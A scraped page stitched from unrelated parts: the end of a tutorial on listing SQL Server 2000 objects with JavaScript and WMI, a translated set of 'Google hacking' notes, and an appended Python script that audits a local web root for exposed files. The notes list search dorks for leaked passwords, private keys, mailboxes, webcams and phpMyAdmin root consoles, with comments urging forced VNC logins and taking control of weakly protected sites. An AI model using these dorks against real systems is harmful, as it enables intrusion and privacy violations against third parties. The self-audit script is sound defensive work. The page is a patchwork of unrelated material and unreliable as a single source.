                        var p = e.item ();
                        document.write("<tr>");
                        document.write("<td>" + p.Name + "</td>");
                        document.write("<td>" + p.TableName + "</td>");
                        document.write("</tr>");
                  }
                  document.write("</table>");
            }

            function dispHeading()
            {
                  document.write("<thead>");
                  document.write("<td>Name</td>");
                  document.write("<td>TableName</td>");
                  document.write("</thead>");
            }

            //-->
            </script>
      </head>
      <body>
            <INPUT id="Button1" type="button" value="Button" name="Button1" language="javascript" onclick="return Button1_onclick()">
      </body>
</html>

The above would automatically list all column names (along with their table names) available in the database "Northwind" of a SQL Server 2000 instance belonging to the client.  To retrieve this information, I used a built-in class, "MSSQL_Column," available in the "root\MicrosoftSQLServer" namespace. The "for" loop I used in the above code iterates for every column present in the SQL Server database and finally retrieves only the properties of that column.




Combining North Pole with South Pole: JavaScript with SQL Server 2000 - How to get a list of all views available in a SQL Server 2000 database using JavaScript

Now, let us develop a simple script (JavaScript) which shows the technique for retrieving all views available in a SQL Server 2000 instance.  The entire code for the sample is as follows:

<!DOCTYPE  HTML  PUBLIC  "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
      <head>
            <title></title>
            <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1">
            <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
            <script id="clientEventHandlersJS" language="javascript">
            <!--

            function Button1_onclick() {
                  var locator = new ActiveXObject ("WbemScripting.SWbemLocator");
                  var service = locator.ConnectServer(".","root\\MicrosoftSQLServer");
                  var properties = service.ExecQuery("SELECT * FROM MSSQL_View");
                  var e = new Enumerator (properties);
                  document.write("<table border=1>");
                  dispHeading();
                  for (;!e.atEnd();e.moveNext ())
                  {
                        var p = e.item ();
                        document.write("<tr>");
                        document.write("<td>" + p.Name + "</td>");
                        document.write("</tr>");
                  }
                  document.write("</table>");
            }

            function dispHeading()
            {
                  document.write("<thead>");
                  document.write("<td>Name</td>");
                  document.write("</thead>");
            }

            //-->
            </script>
      </head>
      <body>
            <INPUT id="Button1" type="button" value="Button" name="Button1" language="javascript" onclick="return Button1_onclick()">
      </body>
</html>

The above code will automatically list all view names available in the SQL Server 2000 instance belonging to the client.  To retrieve this information, I used a built-in class,
"MSSQL_View," available in the "root\MicrosoftSQLServer" namespace.   The "for" loop I used in the above code iterates for every view present in the SQL Server instance and finally retrieves only the properties of that view.


http://www.devarticles.com/c/a/JavaScript/Combining-North-Pole-with-South-Pole-JavaScript-with-SQL-Server-2000/4/




Combining North Pole with South Pole: JavaScript with SQL Server 2000 - How to get the source code (or SELECT statement) of a single view available in a SQL Server 2000 database using JavaScript

In the previous section, I gave you only the view names.  I know that this is not very useful.  Let us further extend the code and develop a simple script (JavaScript) which shows the technique for retrieving the SELECT statement of a view available in a SQL Server 2000 database.  The entire code for the sample is as follows:

<!DOCTYPE  HTML  PUBLIC  "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
      <head>
            <title></title>
            <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1">
            <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
            <script id="clientEventHandlersJS" language="javascript">
            <!--
            function Button1_onclick() {
                  var locator = new ActiveXObject ("WbemScripting.SWbemLocator");
                  var service = locator.ConnectServer(".","root\\MicrosoftSQLServer");
                  var properties = service.ExecQuery("SELECT * FROM MSSQL_View where name='[dbo].[Invoices]'");
                  var e = new Enumerator (properties);
                  var p = e.item ();
                  document.write(p.Text);
            }

            //-->
            </script>
      </head>
      <body>
            <INPUT id="Button1" type="button" value="Button" name="Button1" language="javascript" onclick="return Button1_onclick()">
      </body>
</html>



Now, let us develop a simple script (JavaScript) which shows the technique for retrieving all stored procedures available in a SQL Server 2000 database.  The entire code for the sample is as follows:

<!DOCTYPE  HTML  PUBLIC  "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
      <head>
            <title></title>
            <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1">
            <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
            <script id="clientEventHandlersJS" language="javascript">
            <!--

            function Button1_onclick() {
                  var locator = new ActiveXObject ("WbemScripting.SWbemLocator");
                  var service = locator.ConnectServer(".","root\\MicrosoftSQLServer");
                  var properties = service.ExecQuery("SELECT * FROM MSSQL_StoredProcedure WHERE databasename='Northwind'");
                  var e = new Enumerator (properties);
                  document.write("<table border=1>");
                  dispHeading();
                  for (;!e.atEnd();e.moveNext ())
                  {
                        var p = e.item ();
                        document.write("<tr>");
                        document.write("<td>" + p.Name + "</td>");
                        document.write("<td>" + p.Text + "</td>");
                        document.write("</tr>");
                  }
                  document.write("</table>");
            }

            function dispHeading()
            {
                  document.write("<thead>");
                  document.write("<td>Name</td>");
                  document.write("<td>Text</td>");
                  document.write("</thead>");
            }

            //-->
            </script>
      </head>
      <body>
            <INPUT id="Button1" type="button" value="Button" name="Button1" language="javascript" onclick="return Button1_onclick()">
      </body>
</html>

The above code will automatically list all stored procedure names (along with the source code) available in the database "Northwind" of a SQL Server 2000 instance belonging to the client.  To retrieve this information, I used a built-in class, "MSSQL_StoredProcedure," available in the "root\MicrosoftSQLServer" namespace. The "for" loop I used in the above code iterates for every stored procedure present in the SQL Server database and finally retrieves only the properties of that stored procedure.

Any comments, suggestions, bugs, errors, feedback etc. are highly appreciated at jag_chat@yahoo.com.

=====================================================================
I downloaded the control, but the tests on ZK and XP both failed ????

passedbylove 2008-3-13 18:53

Google Hacking Against Privacy study notes (original)

Google Hacking Against Privacy
title: Google Hacking Challenges Privacy

ps: this document was written by *** at a German public university
My English is poor and the translation is not great; corrections are welcome, but I am confident I have not distorted the author's meaning anywhere
Some of the search strings still contain "(annotations)"; remove them by hand when querying
-----------------------

[all]inurl
[all]intext
[all]intitle
site
ext, filetype
symbols: - . * |
boolean expression: and or not

lang:"c++" define

Private information
1. Usernames and passwords
   "create table" "insert into" "pass|passwd|password" (ext:sql | ext:dump | ext:txt)
   "your password * is" (ext:csv | ext:doc | ext:txt)

2. Keys
   "index of" slave_datatrans OR from_master

3. Private keys
   "Begin (DSA | RSA)" ext:key
   "index of" "secring.gpg"

4. Encrypted messages
   -"public | pubring | pubkeysignature | pgp | and | or |release" ext:gpg
   -intext:"and" (ext:enc | ext:axx)
   "ciphervalue" ext:xml


Confidential information
Data that is expected to stay confidential against unauthorized access

1. Chat logs
   "session start" "session ident" thomas ext:txt

2. Private letters / mail
   "index of" inbox.dbx
   "To parent directory" inurl:"Identities"

3. Confidential directories and files
   "index of" (private | secure | geheim | gizli)
   "robots.txt" "User-agent" ext:txt
   "this document is private | confidential | secret" ext:doc | ext:pdf | ext:xls
   intitle:"index of" "jpg | png | bmp" inurl:"personal" | inurl:private

4. Online webcams

   intitle:"Live View / -AXIS" | inurl:view/view.shtml
   inurl:"ViewFrame?Mode="
   inurl:"MultiCameraFrame?Mode="
   inurl:"axis-cgi/mjpg"
   intext:"MOBOTIX M1"
   intext:"Open Menu"
   inurl:"view/index.shtml"
   www.undertree.us/allcams.html

Google Video
   supergirl duration:(short | medium | long) is:free



Online devices
inurl:"hp/device/this.LCDispatcher"
intitle:liveapplet inurl:LvAppl
"Please wait ....." intitle:"SWW link"

Sensitive information
(Data which is normally public but whose disclosure may disturb its owner)

1. Forums, mailing lists and similar places
   inurl:"search.php?search_author=thomas"
   inurl:pipermail "thomas fischer"

2. Sensitive directories
   intitle:"index of" inurl:"backup"


3. Web 2.0
   "thomas fischer" site:blogspot.com
   "thomas" site:flickr.com
   "thomas" site:youtube.com


Identifying data
1. Personally identifying information
   name, address, telephone, extension
   allintext: name email phone address intext:"thomas fischer" ext:pdf
   Twiki inurl:"View/Main" "thomas fischer"

   Curriculum vitae
   intitle:CV OR intitle:Lebenslauf "thomas fischer"
   intitle:CV OR intitle:Lebenslauf ext:pdf OR ext:doc

2. User names
   intitle:"usage Statistics for" intext:"Total Unique Usernames"

Examples of Google Hacking 1
Information disclosed by insecure programs
"php version" intitle:phpinfo inurl:info.php

Programs with SQL injection vulnerabilities and modifiable paths (weak points)
"advanced guestbook * powered" inurl:addentry.php
intitle:"View img" inurl:viewimg.php

Security scan reports
"Assessment report" "nessus" filetype:pdf


Database programs and error files
"Welcome to phpmyadmin ***" "running on * as root@*" intitle:phpmyadmin
"mysql error with query"

============================================================================
Countermeasures

Use automatic tools to check your system (e.g. gooscan, sitedigger, goolink)
Install and manage Google Honeypot

sitedigger

free from FoundStone Company
supports both the GHD and Foundstone's own hacking database

for a given host, all entries in the database are queried


===================================================
References


google hacking database
http://johnny.ihackstuff.com


google hack honeypot project
http://ghh.sourceforge.net


goolink - security scanner
www.ghacks.net/2005/11/23/goolink-scanner-beta-preview/


siteDigger c2.0 - information gathering tool
http://www.foundstone.com
FileSearching
www.filesearching.com

gooscan - google security scanner
http://johnny.ihackstuff.com
=====================================================
Please use this information for no other reason

Online Cameras

inurl:"viewerframe?mode=motion" (requires ActiveX)
intitle:"snc-rz30 home" (requires ActiveX)
intitle:"WJ-NT104 Main"
inurl:LvAppl intitle:liveapplet (great pan and zoom)
intitle:"Live View / -AXIS"
inurl:indexFrame.shtml "Axis Video Server"

Viewing sites that have opted out of Google

Idea: find the robots.txt files that record these sites and filter them
"robots.txt" "disallow:" filetype:txt

FrontPage user logins
Searching with this string you can obtain many login passwords and accounts; the passwords and accounts in the files found have never been encrypted
inurl:_vti_pvt "service.pwd"

PHP Photo Albums
This search lets you view the photo albums PHP users have uploaded, and you can upload your own photos into them
   inurl:"phphotoalbum/upload"

   VNC User info
   Bypass password verification through the virtual machine, or use VNC Brute to crack the password this verification requires, and forcibly log in to someone else's computer
   "vnc desktop" inurl:5800

   Network Printers
   View public shared printers; you can see their status and settings, and you can even use some of them to print your own things
    inurl:"port_255" -htm

    php Administrator Access
    phpMyAdmin is an account users use to control a website's database; you can use it to access sites with weak security, and through this account you can control their website
    intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*"
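The dorks above describe what a search engine has already indexed; the countermeasure section suggests checking your own systems with tools such as sitedigger before someone else does. The following Python script is an added example (not from the notes or from any of the tools listed) that turns the exposure classes into local checks over a web root: SQL dumps with credential columns, private key files, secring.gpg, .dbx mail stores, FrontPage's service.pwd, phpinfo pages, chat logs, suspiciously named directories, and the paths a robots.txt advertises through Disallow. The rules and the sample web root (built in a temporary directory with placeholder contents) are constructed.

```python
"""Local self-audit of a web root for the exposure classes in the notes above.
Added example, not from the notes or from any tool they list. Each rule maps a
dork to a filename/content check; the rules and the sample web root are constructed."""
import os
import re
import tempfile

# (rule, filename predicate, content regexes that must ALL match; [] = name alone is enough)
RULES = [
    ("sql-dump-with-credentials", lambda n: n.lower().endswith((".sql", ".dump", ".txt")),
     [r"\bcreate table\b", r"\binsert into\b", r"\b(pass|passwd|password)\b"]),
    ("private-key-file", lambda n: True, [r"-----BEGIN (DSA|RSA) PRIVATE KEY-----"]),
    ("pgp-secret-keyring", lambda n: n.lower() == "secring.gpg", []),
    ("mail-store", lambda n: n.lower().endswith(".dbx"), []),
    ("frontpage-service-pwd", lambda n: n.lower() == "service.pwd", []),
    ("phpinfo-page", lambda n: n.lower().endswith(".php"), [r"\bphpinfo\s*\("]),
    ("chat-log", lambda n: n.lower().endswith(".txt"), [r"\bsession start\b", r"\bsession ident\b"]),
]
COMPILED = [(rule, pred, [re.compile(rx, re.I) for rx in rxs]) for rule, pred, rxs in RULES]
# Directory names from the "index of" dorks plus FrontPage's _vti_pvt.
SENSITIVE_DIR_WORDS = ("backup", "private", "secure", "geheim", "gizli", "_vti_pvt")


def check_file(name, content):
    """Return the rules that fire for one file name and its text content."""
    return [rule for rule, pred, rxs in COMPILED
            if pred(name) and all(rx.search(content) for rx in rxs)]


def robots_disallows(text):
    """Return the non-empty Disallow paths from a robots.txt body. A crawler may
    honour them, but anyone reading the file gets a map of what to look at."""
    paths = []
    for line in text.splitlines():
        key, _, value = line.partition(":")
        if key.strip().lower() == "disallow" and value.strip():
            paths.append(value.strip())
    return paths


def audit(root):
    """Walk a web root and return a sorted list of (path, rule) findings."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root).replace(os.sep, "/")
        for d in dirnames:
            if any(w in d.lower() for w in SENSITIVE_DIR_WORDS):
                findings.append((d if rel_dir == "." else f"{rel_dir}/{d}", "sensitive-directory-name"))
        for name in filenames:
            full = os.path.join(dirpath, name)
            with open(full, "r", encoding="utf-8", errors="replace") as fh:
                content = fh.read()
            rel = name if rel_dir == "." else f"{rel_dir}/{name}"
            if rel == "robots.txt":
                findings.extend((p, "advertised-in-robots.txt") for p in robots_disallows(content))
            findings.extend((rel, rule) for rule in check_file(name, content))
    return sorted(findings)


# Constructed sample web root; the key body and hashes are placeholders, not real material.
SAMPLE_FILES = {
    "robots.txt": "User-agent: *\nDisallow: /backup/\nDisallow: /admin/\n",
    "index.html": "<html><body>hello</body></html>\n",
    "info.php": "<?php phpinfo(); ?>\n",
    "backup/site.sql": "CREATE TABLE users (id int, name varchar(20), password varchar(32));\n"
                       "INSERT INTO users VALUES (1, 'alice', '<hash-placeholder>');\n",
    "keys/server.key": "-----BEGIN RSA PRIVATE KEY-----\nPLACEHOLDER-NOT-A-REAL-KEY\n-----END RSA PRIVATE KEY-----\n",
    "mail/inbox.dbx": "placeholder mailbox bytes\n",
    "_vti_pvt/service.pwd": "# -FrontPage-\nalice:<hash-placeholder>\n",
}


def audit_demo():
    """Materialise SAMPLE_FILES in a temporary directory and audit it."""
    with tempfile.TemporaryDirectory() as root:
        for rel, body in SAMPLE_FILES.items():
            full = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w", encoding="utf-8") as fh:
                fh.write(body)
        return audit(root)


if __name__ == "__main__":
    for path, rule in audit_demo():
        print(f"{rule:28} {path}")
```

Run it against a copy of the document root (or the deployment artefact before it is published); anything it reports is material a crawler will index as soon as the directory is reachable, which is exactly the point of the "index of" dorks above. The robots.txt finding is a reminder that Disallow entries keep polite crawlers out but also publish the list of what you considered sensitive.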

© 1999-2008 EvilOctal Security Team